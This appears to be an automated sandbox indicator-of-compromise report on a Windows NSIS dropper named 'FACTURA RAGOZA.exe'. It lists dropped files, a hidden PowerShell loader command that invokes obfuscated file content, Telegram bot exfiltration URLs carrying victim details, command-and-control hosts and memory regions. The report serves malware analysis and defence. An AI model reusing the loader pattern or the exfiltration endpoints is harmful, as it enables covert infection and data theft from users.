IOC Report
FACTURA RAGOZA.exe

loading gif

Files

File Path
Type
Category
Malicious
FACTURA RAGOZA.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen
ASCII text, with very long lines (3155), with CRLF, LF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\FACTURA RAGOZA.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ifvhfv4.o2u.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkoa3b0y.fap.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdmeaber.j2j.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yw5dnaeu.yh1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\FACTURA RAGOZA.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\discourteously.gam
GTA audio index data (SDT)
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\psychograph.rut
data
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\strudsfjerenes.uns
data
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\unnamed.jpg
JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\aktivitetsrunde.txt
ASCII text, with very long lines (360), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\taberen.Dip
data
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\FACTURA RAGOZA.exe
"C:\Users\user\Desktop\FACTURA RAGOZA.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://www.office.com/
unknown
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
https://duckduckgo.com/ac/?q=
unknown
https://api.telegram.org
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://api.telegram.org/bot
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://www.office.com/lB
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20a
unknown
https://drive.usercontent.google.com/
unknown
http://checkip.dyndns.org
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://chrome.google.com/webstore?hl=en
unknown
https://www.ecosia.org/newtab/
unknown
https://reallyfreegeoip.org/xml/155.94.241.186$
unknown
http://varders.kozow.com:8081
unknown
https://github.com/Pester/Pester
unknown
http://aborters.duckdns.org:8081
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://www.google.com
unknown
http://checkip.dyndns.org/
158.101.44.242
http://nsis.sf.net/NSIS_Error
unknown
http://crl.micro
unknown
https://aka.ms/pscore6lB
unknown
https://drive.google.com/
unknown
http://anotherarmy.dns.army:8081
unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://chrome.google.com/webstore?hl=enlB
unknown
https://reallyfreegeoip.org
unknown
https://apis.google.com
unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2021/10/2024%20/%2020:10:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://reallyfreegeoip.org/xml/155.94.241.186
188.114.97.3
https://reallyfreegeoip.org/xml/
unknown
There are 38 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.97.3
malicious
api.telegram.org
149.154.167.220
malicious
checkip.dyndns.org
unknown
malicious
drive.google.com
142.250.186.174
drive.usercontent.google.com
142.250.184.225
checkip.dyndns.com
158.101.44.242

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
188.114.97.3
reallyfreegeoip.org
European Union
malicious
142.250.186.174
drive.google.com
United States
142.250.184.225
drive.usercontent.google.com
United States
158.101.44.242
checkip.dyndns.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
A4E6000
direct allocation
page execute and read and write
malicious
23C61000
trusted library allocation
page read and write
malicious
25E01000
heap
page read and write
8930000
trusted library allocation
page execute and read and write
26890000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
26880000
trusted library allocation
page execute and read and write
3019000
heap
page read and write
26890000
trusted library allocation
page read and write
442000
unkown
page readonly
B8E6000
direct allocation
page execute and read and write
26890000
trusted library allocation
page read and write
23D05000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
269A0000
trusted library allocation
page read and write
24F81000
trusted library allocation
page read and write
23AED000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
86CB000
heap
page read and write
3022000
heap
page read and write
26890000
trusted library allocation
page read and write
24D8C000
trusted library allocation
page read and write
8300000
heap
page read and write
23998000
trusted library allocation
page read and write
26960000
trusted library allocation
page read and write
3006000
heap
page read and write
25F7E000
stack
page read and write
23C40000
trusted library allocation
page read and write
268B0000
trusted library allocation
page execute and read and write
23C40000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
25DA7000
heap
page read and write
8576000
heap
page read and write
23BE0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
4B67000
heap
page read and write
2383F000
stack
page read and write
26FF000
stack
page read and write
4B60000
heap
page read and write
269A0000
trusted library allocation
page read and write
237C0000
remote allocation
page read and write
26990000
trusted library allocation
page read and write
23BF0000
trusted library allocation
page read and write
28F9000
stack
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23B20000
trusted library allocation
page read and write
4A70000
direct allocation
page read and write
24EDB000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
446000
unkown
page readonly
861B000
heap
page read and write
2687F000
stack
page read and write
23BE0000
trusted library allocation
page read and write
42B000
unkown
page read and write
23BE0000
trusted library allocation
page read and write
23BDE000
stack
page read and write
26890000
trusted library allocation
page read and write
23BF0000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
29BD000
stack
page read and write
26890000
trusted library allocation
page read and write
26950000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
670000
direct allocation
page read and write
23E45000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
24EE0000
trusted library allocation
page read and write
23BF0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
88DA000
stack
page read and write
4D0000
heap
page read and write
23BE0000
trusted library allocation
page read and write
269A0000
trusted library allocation
page read and write
452000
unkown
page readonly
26950000
trusted library allocation
page read and write
8790000
trusted library allocation
page execute and read and write
23BF0000
trusted library allocation
page read and write
2FE1000
heap
page read and write
26967000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
25BF000
stack
page read and write
26890000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
23BF0000
trusted library allocation
page read and write
6F9000
heap
page read and write
735A000
heap
page read and write
26950000
trusted library allocation
page read and write
2363C000
stack
page read and write
24D4A000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
24D19000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23E3F000
trusted library allocation
page read and write
268C0000
trusted library allocation
page read and write
4C0000
heap
page readonly
6FA000
heap
page read and write
23D09000
trusted library allocation
page read and write
268B0000
trusted library allocation
page read and write
23BF0000
trusted library allocation
page read and write
269A0000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
6FD000
heap
page read and write
765E000
stack
page read and write
5006000
trusted library allocation
page read and write
23DEF000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
2EC0000
heap
page readonly
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
7070000
heap
page read and write
7710000
trusted library allocation
page read and write
237FE000
stack
page read and write
24F8C000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23F48000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
430000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
2DE9000
trusted library allocation
page read and write
2DF0000
heap
page read and write
26930000
trusted library allocation
page execute and read and write
7412000
heap
page read and write
24CC7000
trusted library allocation
page read and write
2405C000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
24F9A000
trusted library allocation
page read and write
76A0000
trusted library allocation
page read and write
2E0A000
trusted library allocation
page execute and read and write
2F20000
heap
page read and write
23BE0000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
6E56000
remote allocation
page execute and read and write
83CB000
trusted library allocation
page read and write
25FE000
stack
page read and write
23BE0000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
401000
unkown
page execute read
26950000
trusted library allocation
page read and write
880000
direct allocation
page read and write
2357D000
stack
page read and write
23BE0000
trusted library allocation
page read and write
8A0000
direct allocation
page read and write
269D0000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
269C0000
trusted library allocation
page execute and read and write
26890000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
604A000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
28FD000
stack
page read and write
23CC6000
trusted library allocation
page read and write
3BC0000
remote allocation
page execute and read and write
68A000
heap
page read and write
26990000
trusted library allocation
page read and write
24F29000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23A6C000
stack
page read and write
26890000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23C00000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
23B60000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
24FB9000
trusted library allocation
page read and write
23F18000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
8240000
heap
page read and write
2DA0000
trusted library section
page read and write
24D9E000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
23C2D000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
8603000
heap
page read and write
26890000
trusted library allocation
page read and write
D6E6000
direct allocation
page execute and read and write
823F000
stack
page read and write
26980000
trusted library allocation
page read and write
24E62000
trusted library allocation
page read and write
8653000
heap
page read and write
26890000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
850000
direct allocation
page read and write
23FA7000
trusted library allocation
page read and write
23DDF000
trusted library allocation
page read and write
23C10000
heap
page read and write
9AE6000
direct allocation
page execute and read and write
2D50000
heap
page read and write
26890000
trusted library allocation
page read and write
4B10000
direct allocation
page read and write
26950000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
23B10000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23C04000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
4A80000
direct allocation
page read and write
268D0000
trusted library allocation
page read and write
4AB0000
direct allocation
page read and write
23BE0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
7730000
trusted library allocation
page read and write
23BF0000
trusted library allocation
page read and write
23B40000
trusted library allocation
page read and write
23BF0000
trusted library allocation
page read and write
24FB3000
trusted library allocation
page read and write
268D0000
trusted library allocation
page read and write
26950000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
8693000
heap
page read and write
237C0000
remote allocation
page read and write
23C40000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
2DE0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
8772000
trusted library allocation
page read and write
25D72000
heap
page read and write
23E4D000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
269A0000
trusted library allocation
page read and write
268D0000
trusted library allocation
page read and write
2618E000
stack
page read and write
26980000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
2DD3000
trusted library allocation
page execute and read and write
42F000
unkown
page read and write
4AE0000
direct allocation
page read and write
8C0000
direct allocation
page read and write
23C20000
trusted library allocation
page read and write
86D4000
heap
page read and write
2610D000
stack
page read and write
24D37000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
90E6000
direct allocation
page execute and read and write
26890000
trusted library allocation
page read and write
268A0000
trusted library allocation
page execute and read and write
23B00000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
2D4E000
stack
page read and write
26890000
trusted library allocation
page read and write
4AA0000
direct allocation
page read and write
25D68000
heap
page read and write
26980000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
2970000
heap
page read and write
8510000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
2402E000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
462000
trusted library allocation
page read and write
23D68000
trusted library allocation
page read and write
268D0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
31A0000
heap
page execute and read and write
23BE0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
96000
stack
page read and write
268A0000
trusted library allocation
page read and write
26960000
trusted library allocation
page read and write
2EBE000
stack
page read and write
24F64000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
269A0000
trusted library allocation
page read and write
25D00000
heap
page read and write
25D36000
heap
page read and write
75A000
heap
page read and write
24D8E000
trusted library allocation
page read and write
860000
direct allocation
page read and write
26890000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
2614E000
stack
page read and write
76F000
heap
page read and write
6EE000
stack
page read and write
26890000
trusted library allocation
page read and write
729E000
stack
page read and write
AEE6000
direct allocation
page execute and read and write
452000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23E7D000
trusted library allocation
page read and write
6F2000
heap
page read and write
23BE0000
trusted library allocation
page read and write
90F000
stack
page read and write
20D4000
heap
page read and write
6059000
trusted library allocation
page read and write
7510000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23AE6000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
7740000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
235FD000
stack
page read and write
23BF0000
trusted library allocation
page read and write
2371E000
stack
page read and write
8920000
trusted library allocation
page execute and read and write
23BE0000
trusted library allocation
page read and write
8190000
trusted library allocation
page read and write
8910000
heap
page read and write
23BF0000
trusted library allocation
page read and write
82E0000
trusted library allocation
page read and write
2394E000
stack
page read and write
24EE7000
trusted library allocation
page read and write
23D15000
trusted library allocation
page read and write
442000
unkown
page readonly
710000
heap
page read and write
2D80000
heap
page read and write
26890000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
5A56000
remote allocation
page execute and read and write
434000
unkown
page read and write
26890000
trusted library allocation
page read and write
24FA5000
trusted library allocation
page read and write
268D0000
trusted library allocation
page execute and read and write
23BE0000
trusted library allocation
page read and write
24F76000
trusted library allocation
page read and write
24CC2000
trusted library allocation
page read and write
2620E000
stack
page read and write
26890000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
507000
heap
page read and write
23C20000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
85A8000
heap
page read and write
7FDA8000
trusted library allocation
page execute and read and write
23BE0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
8940000
direct allocation
page execute and read and write
268A0000
trusted library allocation
page read and write
2501E000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
24CF7000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
269E0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
742000
heap
page read and write
605F000
trusted library allocation
page read and write
7590000
heap
page execute and read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
8500000
trusted library allocation
page read and write
24114000
trusted library allocation
page read and write
25DCF000
heap
page read and write
2179000
heap
page read and write
81FD000
stack
page read and write
269B0000
trusted library allocation
page read and write
8900000
trusted library allocation
page read and write
23ACB000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
77CB000
stack
page read and write
23BE0000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
26950000
trusted library allocation
page read and write
5ED9000
trusted library allocation
page read and write
3C56000
remote allocation
page execute and read and write
23C20000
trusted library allocation
page read and write
268D0000
trusted library allocation
page read and write
46B000
trusted library allocation
page execute and read and write
23860000
direct allocation
page read and write
24F1A000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
25DA7000
heap
page read and write
8780000
trusted library allocation
page execute and read and write
24FDE000
trusted library allocation
page read and write
434000
trusted library allocation
page read and write
24EBB000
trusted library allocation
page read and write
2353F000
stack
page read and write
26950000
trusted library allocation
page read and write
25DC7000
heap
page read and write
23BE0000
trusted library allocation
page read and write
8256000
remote allocation
page execute and read and write
23BE0000
trusted library allocation
page read and write
24CF3000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
26980000
trusted library allocation
page read and write
24D3E000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
2910000
trusted library allocation
page read and write
8F0000
heap
page read and write
268C0000
trusted library allocation
page execute and read and write
7520000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
7374000
heap
page read and write
26890000
trusted library allocation
page read and write
268D0000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
212E000
stack
page read and write
26890000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
24C61000
trusted library allocation
page read and write
23CC4000
trusted library allocation
page read and write
23AD2000
trusted library allocation
page read and write
23A70000
heap
page read and write
23E1C000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
84D0000
trusted library allocation
page read and write
31EB000
stack
page read and write
74C000
heap
page read and write
23D11000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
238B0000
trusted library allocation
page read and write
2EF0000
trusted library allocation
page execute and read and write
23AC0000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
23B40000
trusted library allocation
page read and write
23C50000
heap
page execute and read and write
26890000
trusted library allocation
page read and write
24143000
trusted library allocation
page read and write
2175000
heap
page read and write
23B30000
trusted library allocation
page read and write
43D000
trusted library allocation
page execute and read and write
8B7000
heap
page read and write
23B50000
heap
page read and write
446000
unkown
page readonly
23BE0000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23AF2000
trusted library allocation
page read and write
450000
trusted library allocation
page read and write
6AF000
stack
page read and write
24ED4000
trusted library allocation
page read and write
830000
direct allocation
page read and write
23BE0000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
269E0000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
26980000
trusted library allocation
page read and write
700000
heap
page read and write
6456000
remote allocation
page execute and read and write
701000
heap
page read and write
23CD3000
trusted library allocation
page read and write
268A0000
trusted library allocation
page read and write
20E0000
heap
page read and write
23C40000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
6CD000
heap
page read and write
4B40000
trusted library allocation
page read and write
4A1D000
stack
page read and write
25DAC000
heap
page read and write
24C6B000
trusted library allocation
page read and write
24EEC000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
28BC000
stack
page read and write
23ADA000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
26990000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
236CF000
stack
page read and write
25E00000
heap
page read and write
23B30000
trusted library allocation
page read and write
8154000
stack
page read and write
440000
unkown
page read and write
23ABE000
stack
page read and write
20B0000
heap
page read and write
2DD4000
trusted library allocation
page read and write
2170000
heap
page read and write
23C40000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
30EE000
stack
page read and write
25D79000
heap
page read and write
26880000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
268D0000
trusted library allocation
page read and write
23907000
stack
page read and write
85A0000
heap
page read and write
440000
trusted library allocation
page read and write
49DE000
stack
page read and write
23B40000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
29FE000
stack
page read and write
76B0000
trusted library allocation
page execute and read and write
23B20000
trusted library allocation
page read and write
24D85000
trusted library allocation
page read and write
8170000
trusted library allocation
page execute and read and write
23BE0000
trusted library allocation
page read and write
23CCF000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
269A0000
trusted library allocation
page read and write
C2E6000
direct allocation
page execute and read and write
23C40000
trusted library allocation
page read and write
316E000
stack
page read and write
23C40000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
4AD0000
direct allocation
page read and write
26890000
trusted library allocation
page read and write
452000
unkown
page readonly
23C00000
trusted library allocation
page read and write
505000
heap
page read and write
26890000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
2F00000
trusted library allocation
page read and write
26960000
trusted library allocation
page read and write
24FD6000
trusted library allocation
page read and write
23B40000
trusted library allocation
page read and write
23C20000
trusted library allocation
page read and write
24F92000
trusted library allocation
page read and write
26950000
trusted library allocation
page read and write
23D19000
trusted library allocation
page read and write
23B50000
trusted library allocation
page read and write
24EBD000
trusted library allocation
page read and write
467000
trusted library allocation
page execute and read and write
23BE0000
trusted library allocation
page read and write
8160000
heap
page read and write
25DCE000
heap
page read and write
26890000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23E47000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23B40000
trusted library allocation
page read and write
23850000
direct allocation
page read and write
23E43000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
23D44000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
267FF000
stack
page read and write
7316000
heap
page read and write
269A0000
trusted library allocation
page read and write
25DCE000
heap
page read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
83B0000
trusted library allocation
page read and write
4B20000
direct allocation
page read and write
4B47000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
23B9D000
stack
page read and write
76F0000
trusted library allocation
page read and write
5A5000
heap
page read and write
23E52000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
88F0000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
26970000
trusted library allocation
page execute and read and write
76C000
heap
page read and write
23AE1000
trusted library allocation
page read and write
23C40000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
2F29000
heap
page read and write
23BE0000
trusted library allocation
page read and write
2E15000
trusted library allocation
page execute and read and write
26890000
trusted library allocation
page read and write
26890000
trusted library allocation
page read and write
76D0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
9050000
direct allocation
page execute and read and write
23B30000
trusted library allocation
page read and write
24E4A000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23ACE000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
2DF6000
heap
page read and write
6ED0000
direct allocation
page read and write
26950000
trusted library allocation
page read and write
26950000
trusted library allocation
page read and write
23ADE000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
24F7D000
trusted library allocation
page read and write
2DB0000
trusted library section
page read and write
25D7A000
heap
page read and write
8570000
heap
page read and write
4AF0000
direct allocation
page read and write
810000
direct allocation
page read and write
26890000
trusted library allocation
page read and write
24ECD000
trusted library allocation
page read and write
261CF000
stack
page read and write
269A0000
trusted library allocation
page read and write
269A0000
trusted library allocation
page read and write
2ED8000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
23BE0000
trusted library allocation
page read and write
24FBF000
trusted library allocation
page read and write
23B30000
trusted library allocation
page read and write
